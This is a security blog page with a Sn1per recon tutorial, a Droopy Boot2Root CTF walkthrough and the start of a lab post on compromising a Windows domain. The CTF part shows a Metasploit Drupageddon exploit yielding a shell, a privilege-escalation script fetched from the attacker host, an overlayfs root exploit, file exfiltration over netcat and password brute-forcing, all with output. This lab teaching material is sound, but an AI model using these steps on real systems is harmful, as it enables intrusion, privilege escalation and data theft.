Sn1per-Professional-Discover-The-Attack-Surface1

Attack Surface Management With Sn1per Professional

Continuous Attack Surface Management (ASM) and reduction has become a crucial function for every organization to gain visibility of their perimeter security. Having the right tools and processes in place is vital to detecting new vulnerabilities before attackers do. In this blog post, we will outline the basic steps for discovering the attack surface with Sn1per Professional v9.0.

(more…)

February 8, 2021 Bug Bounties, Hacking Tutorials, News No comments yet

Bug Bounty Recon Like A Pro

Overview

In this blog post, I will cover the basic steps to performing bug bounty recon against large, open scoped programs and penetration tests.

If you’re like most starting out, this process can seem daunting and overwhelming depending on how many hosts you’re dealing with. Twitter for instance has 20,000+ subdomains and a HUGE attack surface to go through. How do you know where to focus your time? How do you keep track of which hosts you scanned and reviewed? These questions can quickly lead you spinning in circles, wasting valuable time while more experienced hunters get the gold. Luckily, there are tools and methodologies that can assist and make your life easier as a bug bounty hunter or penetration tester. This is where Sn1per comes in…

What is Sn1per?

Sn1per is an automated pentest reconnaissance scanner that can be used during penetration tests and bug bounties and to enumerate targets and scan for vulnerabilities. There are two versions of Sn1per available depending on your needs. Sn1per Community Edition (CE) is the open source scan engine that is maintained on Github (https://github.com/1N3/Sn1per). Sn1per Professional is XeroSecurity’s premium reporting add on for Sn1per and is available exclusively from the XeroSecurity website (https://xerosecurity.com).

Installation

Installation is extremely easy. Just clone the Github repo (git clone https://github.com/1N3/Sn1per) and run ./install.sh from a Kali Linux OS. This will install all tools and dependencies which are used to collect recon info and scan for vulnerabilities.

Scoping your target

So we have Sn1per installed and we’ve recited “The Rifleman’s Creed” a few times, the next phase is scoping our target. This is fairly obvious but we need to carefully review the bug bounty or pentest scope which gives us legal permission to test without getting thrown in prison. If you find yourself getting outside the intended scope, you’ve been warned – This “could” land you in jail!.
Now that the legal disclaimer is out of the way, what’s the first step?

Tactical Reconnaissance & OSINT

The first step in your reconnaissance process should be enumerating all subdomains and hosts within the target scope. For this, we’re interested in any wildcard domains (ie. *.target.com). In this case, it is up to the researcher to hunt for subdomains and hosts which fall within this target scope but haven’t been explicitly stated. For this, we will use sniper to actively and passively scan a target domain for subdomains via the -re switch and we’ll create a new workspace to store all our hosts via the -w switch. Additionally, we’ll also add the –osint switch to our scan to perform basic OSINT (Open Source Intelligence Gathering) searches on the target domain. This can reveal tons of useful information such as email addresses, public domains, documents, usernames, software used, whois info, reverse IP lookups, virtual hosts, etc. In addition, Sn1per will perform basic checks for subdomain hijacking and takeovers.
sniper -t target.com --recon --osint -w workspace_alias
This will store a complete list of all subdomains discovered and sorted at the following location:
/usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/domains/domains-all-sorted.txt

Calling In The Airstrike…

 

Now that we’ve enumerated all subdomains for the in-scope wildcard domain, we need to quickly enumerate all hosts with a high level flyover. This can be done by passing our host list from the previous step via the -f switch and running sniper in airstrike mode via the -m airstrike options. This will store all gathered data to our workspace and combine the data from all hosts scanned under /usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/. Some basic info gathered from this mode include: DNS, open ports, HTTP headers, SSL ciphers, web fingerprints, TCP banners, WAF detection and basic file/directory and passive URL discovery.
sniper -f /usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/domains/domains-all-sorted.txt -m airstrike -w workspace

Summary

After the Sn1per finishes scanning all hosts in our workspace, Sn1per Professional gives us some high level info via the console for each host as shown below. This will help us get a high level visual of the attack surface based on which ports are open, interesting HTTP headers, page titles and DNS records. It will become very clear that if the host has no DNS or open ports, there probably isn’t much of an attack surface to dig into further. It’s best to focus on interesting ports (ie. port 21 (FTP), port 22 (SSH), 3306 (MySQL), etc.) and web targets with interesting headers (ie. Server: Apache Tomcat v7.0.0) may be vulnerable and have known exploit code available.

Professional Reporting Interface

After our report gets generated, we can see Sn1per enumerated and scanned 1268 unique hosts automatically. As a penetration tester, you can now sift through all the information contained in your workspace to begin looking for interesting hosts and potential vulnerabilities. To help us manage all this data, we will leverage Sn1per Professional for the next steps in the process. Sn1per Professional offers the following features to help make our lives a bit easier.

Features:

– Professional reporting interface.
– Slideshow for all gathered screenshots.
– Searchable and sortable DNS, IP and open port database.
– Quick links to online recon tools and Google hacking queries.
– Personalized notes field for each host.

Demo Video:

Slideshow For All Gathered Screenshots

From here, we can perform visual recon via the “Slideshow” feature in Sn1per Pro. This can reveal all sorts of potentially interesting hosts which can help identify which hosts need to be scanned further for more information.

Searchable/Sortable DNS, IP and Open Port Database

To supplement our surface level reconnaissance, we can also utilize the “Port List” feature which provides a widget of all subdomains, open ports, DNS and page titles. All data stored within this widget can then be sorted and searched for based on your needs (ie. If you’re looking for port 22/tcp (SSH), search for “22”. If you want to find all virtual hosts in the environment based on the same page title, enter the full page title (ie. “Overstock Cars”), etc. The possibilities here are endless but we can quickly find interesting hosts and ports or DNS records using this feature in Sn1per Professional.

Conclusion

This concludes part one of this series. This is by no means a comprehensive recon tutorial, but it should be enough to get you started in the process. Stay tuned for more recon tips and tricks for getting the most out of your bug bounty and pentest recon with Sn1per.
@xer0dayz

 

October 9, 2018 Bug Bounties, Hacking Tutorials, Uncategorized No comments yet

Droopy Boot2Root CTF Solution

Overview

This is a step by step walk through for the Droopy CTF Boot2Root VM which can be downloaded here. Some output has been omitted for brevity, but you get the drift ๐Ÿ˜‰ Enjoy! -1N3 @CrowdShield

Enumeration

As with most pentests, I rely mainly on Sn1per which can be downloaded here to quickly enumerate targets and pinpoint possible exploit vectors…

  • # sniper 192.168.1.66 web report
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.7 by 1N3

################################### Running TCP port scan ##########################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-11 08:28 MST
Nmap scan report for 192.168.1.66
Host is up (0.00027s latency).
Not shown: 35 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:A5:E0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.66
+ Target Hostname:    192.168.1.66
+ Target Port:        80
+ Start Time:         2016-05-11 08:28:13 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8384 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2016-05-11 08:28:36 (GMT-7) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________


[!] [!] The remote website is up, but does not seem to be running WordPress.

[-] Date & Time: 11/05/2016 08:28:42
[-] Target: http://192.168.1.66
[M] Website Not in HTTPS: http://192.168.1.66
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.1.66/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[-] Date & Time: 11/05/2016 08:30:00
[-] Completed in: 0:01:18

[-] Date & Time: 11/05/2016 08:30:01
[-] Target: http://192.168.1.66/wordpress

Exploitation

Since we now know the site is vulnerable to SA-CORE-2014-005 (ie. Drupageddon), we can quickly find the exploit using Findsploit which can be downloaded here.

   ___ _           _           _       _ _   
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_ 
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_ 
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|                  

+ -- --=[findsploit v1.3 by 1N3
+ -- --=[https://xerosecurity.com

+ -- --=[SEARCHING:  drupal   

+ -- --=[NMAP SCRIPTS

/usr/share/nmap/scripts/http-drupal-enum.nse
/usr/share/nmap/scripts/http-drupal-enum-users.nse

+ -- --=[METASPLOIT EXPLOITS

msf_search/auxiliary:   gather/drupal_openid_xxe                                       2012-10-17       normal  Drupal OpenID External Entity Injection
msf_search/auxiliary:   scanner/http/drupal_views_user_enum                            2010-07-02       normal  Drupal Views Module Users Enumeration
msf_search/exploits:   multi/http/drupal_drupageddon                                  2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection

+ -- --=[Press any key to search online or Ctrl+C to exit...

Drupageddon Exploit

After, we quickly load up the exploit using Metasploit and fire away for an easy shell…

  • msf exploit(drupal_drupageddon) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
  • msf exploit(drupal_drupageddon) > exploit
[*] 192.168.1.66:80 - Testing page
[*] Started bind handler
[*] 192.168.1.66:80 - Creating new user KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Logging in as KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Trying to parse enabled modules
[*] 192.168.1.66:80 - Enabling the PHP filter module
[*] 192.168.1.66:80 - Setting permissions for PHP filter module
[*] 192.168.1.66:80 - Getting tokens from create new article page
[*] 192.168.1.66:80 - Calling preview page. Exploit should trigger...
[*] Sending stage (32461 bytes) to 192.168.1.66
[*] Meterpreter session 1 opened (192.168.1.60:58733 -> 192.168.1.66:4444) at 2016-04-29 14:04:18 -0700
  • meterpreter > ls
Listing: /var/www/html
======================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  89339  fil   2014-12-11 06:11:45 -0700  CHANGELOG.txt
100644/rw-r--r--  1481   fil   2014-12-11 06:11:45 -0700  COPYRIGHT.txt
100644/rw-r--r--  1717   fil   2014-12-11 06:11:45 -0700  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2014-12-11 06:11:45 -0700  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2014-12-11 06:11:45 -0700  INSTALL.sqlite.txt
100644/rw-r--r--  17995  fil   2014-12-11 06:11:45 -0700  INSTALL.txt
100664/rw-rw-r--  18092  fil   2014-12-11 06:11:45 -0700  LICENSE.txt
100644/rw-r--r--  8542   fil   2014-12-11 06:11:45 -0700  MAINTAINERS.txt
100644/rw-r--r--  5382   fil   2014-12-11 06:11:45 -0700  README.txt
100644/rw-r--r--  9642   fil   2014-12-11 06:11:45 -0700  UPGRADE.txt
100644/rw-r--r--  6604   fil   2014-12-11 06:11:45 -0700  authorize.php
100644/rw-r--r--  720    fil   2014-12-11 06:11:45 -0700  cron.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  includes
100644/rw-r--r--  11510  fil   2014-12-11 06:11:45 -0700  index.html
100644/rw-r--r--  529    fil   2014-12-11 06:11:45 -0700  index.php
100644/rw-r--r--  20     fil   2014-12-11 06:11:45 -0700  info.php
100644/rw-r--r--  703    fil   2014-12-11 06:11:45 -0700  install.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  misc
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  modules
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  profiles
100644/rw-r--r--  1550   fil   2014-12-11 06:11:45 -0700  robots.txt
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  scripts
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  sites
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  themes
100644/rw-r--r--  19986  fil   2014-12-11 06:11:45 -0700  update.php
100644/rw-r--r--  2178   fil   2014-12-11 06:11:45 -0700  web.config
100644/rw-r--r--  417    fil   2014-12-11 06:11:45 -0700  xmlrpc.php
  • meterpreter > shell
Process 1227 created.
Channel 0 created.
exit
meterpreter >

Privilege Escalation

Now that we’ve gained initial access, the next logical step would be to see if we can escalate our privileges to root… To help speed up the process, I wrote a small shell script to quickly enumerate linux based systems for exploit vectors which can be downloaded here.

  • wget 192.168.1.60/linux-privesc.sh
--2016-04-29 22:21:14--  http://192.168.1.60/linux-privesc.sh
Connecting to 192.168.1.60:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14117 (14K) [text/x-sh]
Saving to: 'linux-privesc.sh'

     0K .......... ...                                        100% 12.8M=0.001s

2016-04-29 22:21:14 (12.8 MB/s) - 'linux-privesc.sh' saved [14117/14117]
  • bash linux*
-[Linux Privilege Escalation Script by 1N3]=--
-[http://treadstonesecurity.blogspot.com]=--

#>01 Whats the distribution type? What version?
#>02 What's the Kernel version? Is it 64-bit?
#>03 What can be learnt from the environmental variables?
#>04 Is there a printer?
#>05 What services are running? Which service has which user
#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!
#>07 What applications are installed? What version are they? Are they currently running?
#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
#>09 What jobs are scheduled?
#>10 Any plain text usernames and/or passwords?
#>11 What NIC(s) does the system have? Is it connected to another network?
#>12 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
#>13 Whats cached? IP and/or MAC addresses
#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
#>15 What sensitive files can be found?
#>16 Anything interesting in the home directorie(s)? If its possible to access
#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
#>18 What has the user being doing? Is there any password in plain text? What have they been edting?
#>19 What user information can be found?
#>20 Can private-key information be found?
#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?
#>22 What can be found in /var/?
#>23 Any settings/files (hidden) on website? Any settings file with database information?
#>24 Is there anything in the log file(s) (Could help with Local File Includes!)
#>25 If commands are limited, you break out of the jail shell?
#>26 How are file-systems mounted?
#>27 Are there any unmounted file-systems?
#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
#>29 SGID (chmod 2000) - run as the  group, not the user who started it.
#>30 SUID (chmod 4000) - run as the  owner, not the user who started it.
#>31 SGID or SUID
#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm
#>33 world-writeable folders
#>34 world-writeable & executable folders
#>35 Any problem files? Word-writeable, nobody files
#>36 world-writeable files
#>37 Noowner files
#>38 What development tools/languages are installed/supported?
#>39 How can files be uploaded?

#>01 Whats the distribution type? What version?
#####################################################################
Ubuntu 14.04.1 LTS \n \l

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

#>02 What's the Kernel version? Is it 64-bit?
#####################################################################
Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Linux 3.13.0-43-generic x86_64
linux-privesc.sh: line 68: rpm: command not found
[    0.000000] Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 (Ubuntu 3.13.0-43.72-generic 3.13.11.11)
[    0.373742] [Firmware Bug]: ACPI: BIOS _OSI(Linux) query ignored
[    0.947541] Linux agpgart interface v0.103
vmlinuz-3.13.0-43-generic

Finding A Local Root Exploit

Now that we know the OS and kernel version, we can quickly search https://www.kernel-exploits.com/ for a suitable exploit. In this case, the overlayfs exploit should do the trick and can be downloaded here.

  • meterpreter > shell
Process 30295 created.
Channel 0 created.
  • pwd
/tmp
  • ./ofs_64.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
  • # whoami
root

Interesting Email

Now that we’re “root”, we should probably look for that flag. From here I quickly discovered some interesting email under /var/log/mail…

  • # cd /var
  • # ls
backups
cache
lib
local
lock
log
mail
opt
run
spool
tmp
www
  • # cd backups
  • # cd ../mail
  • # ls
www-data
  • # cat www-data
From Dave <[email protected]> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <[email protected]>
Subject: rockyou with a nice hat!
Message-ID: <[email protected]>
X-IMAP: 0080081351 0000002016l
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave
# 
</[email protected]></[email protected]>

Interesting File

After getting “root” on the box, I quickly discovered the TrueCrypt volume (/root/dave.tc) and transfered it back to my Kali box using netcat to analyze further…

# pwd
/root/
# ls
dave.tc
# nc -lvvp 4444 < dave.tc
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.1.60] port 4444 [tcp/*] accepted (family 2, sport 54838)
# ls
dave.tc
#

Brute Forcing TrueCrypt Volumes

Since we know the TrueCrypt volume is encrypted and password protected, we’ll need a program to attempt a dictionary attack with and we’ll use the rockyou.txt wordlist as our dictionary… For this, I chose OTFBrutusGUI which can be downloaded here.

Mounting the TrueCrypt Volume

Now that we have the password for the volume, we should be able to install and mount the volume from our Kali box. NOTE: You’ll need to install truecrypt first for this to work… obviously!

Capturing the Flag

Now that our TrueCrypt volume is mounted, we can quickly navigate the directory structure and have no problems finding our flag.txt hiding in a hidden directory.

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare

 

May 15, 2016 CTF's, Uncategorized No comments yet

Pwning Windows Domains From The Command Line

  • As a long time Linux user since in the early 90’s, I still find it deeply satisfying relying primarily on text-based tools and old school “hackery” to get the job done. That’s why I decided to outline several tools and techniques that can be used in order to compromise an entire Active Directory domain completely from the command line. To demonstrate, I setup a test LAB and domain (XEROSECURITY) which consists of a Windows 2012 AD Domain Controller (192.168.1.138) and a Windows XP Workstation (192.168.1.129) and my attacker machine (192.168.1.113) running Kali Linux 2.0. The info below offers a step by step guide to basic Windows penetration testing in a “Owned and Exposed” and “Phrack” ezine format. Respect out to all the old-school hackers who actually know what Phrack and Owned and Exposed is… This post is for you! -1N3

    TOOLS

    - Kali Linux https://www.kali.org/
- Responder https://github.com/SpiderLabs/Responder.git
- Sn1per https://github.com/1N3/Sn1per.git
- BruteX https://github.com/1N3/BruteX.git
- Metasploit hhttp://www.metasploit.com/
- CrackMapExec https://github.com/byt3bl33d3r/CrackMapExec.git
- pth-smbexec https://github.com/pentestgeek/smbexec.git
- netdiscover http://nixgeneration.com/~jaime/netdiscover/
- smb.sh SMBExec script https://gist.github.com/1N3/c784d60f6e5956e019c7#file-windows-post-exploitation-sh
- metasploit-windows-post.rc script https://gist.github.com/1N3/7b852bb24e87ee6f7389
- Hashcat http://hashcat.net/oclhashcat/

    DISCOVERY

    NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C

[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: ALL
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded:  function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: True
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF


[+]Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.

[Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (192.168.1.113) is not on the same subnet than the DNS server (206.248.154.22). Use python Icmp-Redirect.py for more details.
[Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (192.168.1.113) is not on the same subnet than the DNS server (206.248.154.170). Use python Icmp-Redirect.py for more details.
[Analyze mode: Browser]Datagram Request from IP: 192.168.1.129 hostname: TEST-3F6416AC49 via the: Workstation/Redirector Service. to: XEROSECURITY. Service: Domain controller service. This name is a domain controller.
[!]Workstations/Servers detected on Domain XEROSECURITY:
   -TEST-3F6416AC49
   -WIN-8MSB2DD52P9
[Analyze mode LANMAN]:
[!]Domain detected on this network:
   -WORKGROUP
   -XEROSECURITY
[!]Workstations/Servers detected on Domain XEROSECURITY:
   -TEST-3F6416AC49
   -WIN-8MSB2DD52P9

    
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                         
                                                                                                                                                                                                                                       
 7 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 384                                                                                                                                                                       
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 192.168.1.129   00:0c:29:fb:8c:7c    01    042   VMware, Inc.                                                                                                                                                                                                                                                                                               
 192.168.1.138   00:0c:29:82:29:f9    01    042   VMware, Inc.
    • [email protected]:/pentest/loot/# echo “192.168.1.129” >> /pentest/loot/win-targets.txt [email protected]:/pentest/loot/# echo “192.168.1.138” >> /pentest/loot/win-targets.txt
                    ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3
                                         |
                  |                      |
                  |                    -/_\-
                -/_\-   ______________(/ . \)______________
   ____________(/ . \)_____________    \___/     <>
   <>           \___/      <>    <>
 
      ||
      <>
                            ||
                            <>
                                       ||
                                       ||            BIG
        _____               __         <>      (^)))^ BOOM!
  BOOM!/((  )\       BOOM!((  )))            (     ( )
 ---- (__()__))          (() ) ))           (  (  (   )
     ||  |||____|------    \  (/   ___     (__\     /__)
      |__|||  |     |---|---|||___|   |___-----|||||
  |  ||.  |   |       |     |||                |||||
      |__|||  |     |---|---|||___|   |___-----|||||
  |  ||.  |   |       |     |||                |||||
 __________________________________________________________
 Bomb raid (contributed by Michael aka [email protected])

 + -- --=[Launching airstrike: 192.168.1.129 
################################### Running passive scans #########################
TCP open	           epmap[  135]		from 192.168.1.129  ttl 128 
TCP open	     netbios-ssn[  139]		from 192.168.1.129  ttl 128 
TCP open	    microsoft-ds[  445]		from 192.168.1.129  ttl 128 
TCP open	   ms-wbt-server[ 3389]		from 192.168.1.129  ttl 128 


 + -- --=[Launching airstrike: 192.168.1.138 
################################### Running passive scans #########################
TCP open	            name[   42]		from 192.168.1.138  ttl 128 
TCP open	          domain[   53]		from 192.168.1.138  ttl 128 
TCP open	            http[   80]		from 192.168.1.138  ttl 128 
TCP open	        kerberos[   88]		from 192.168.1.138  ttl 128 
TCP open	           epmap[  135]		from 192.168.1.138  ttl 128 
TCP open	     netbios-ssn[  139]		from 192.168.1.138  ttl 128 
TCP open	            ldap[  389]		from 192.168.1.138  ttl 128 
TCP open	    microsoft-ds[  445]		from 192.168.1.138  ttl 128 
TCP open	           ldaps[  636]		from 192.168.1.138  ttl 128 

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/  
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/    
                                <   
                                 ...'
                                 
    WAFW00F - Web Application Firewall Detection Tool
    
    By Sandro Gauci && Wendel G. Henrique

Checking http://192.168.1.138
Generic Detection results:
The site http://192.168.1.138 seems to be behind a WAF 
Reason: The server header is different when an attack is detected.
The server header for a normal response is "Microsoft-IIS/8.5", while the server header a response to an attack is "Microsoft-HTTPAPI/2.0.",
Number of requests: 12
http://192.168.1.138 [200] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/8.5], IP[192.168.1.138], Microsoft-IIS[8.5], Title[IIS Windows Server]

    ENUMERATION

     
                              ____
                      __,-~~/~    `---.
                    _/_,---(      ,    )
                __ /        <    /   )  \___
 - ------===;;;'====------------------===;;;===----- -  -
                   \/  ~'~'~'~'~'~\~'~)~'/
                   (_ (   \  (     >    \)
                    \_( _ <         >_>'
                       ~ `-i' ::>|--"
                           I;|.|.|
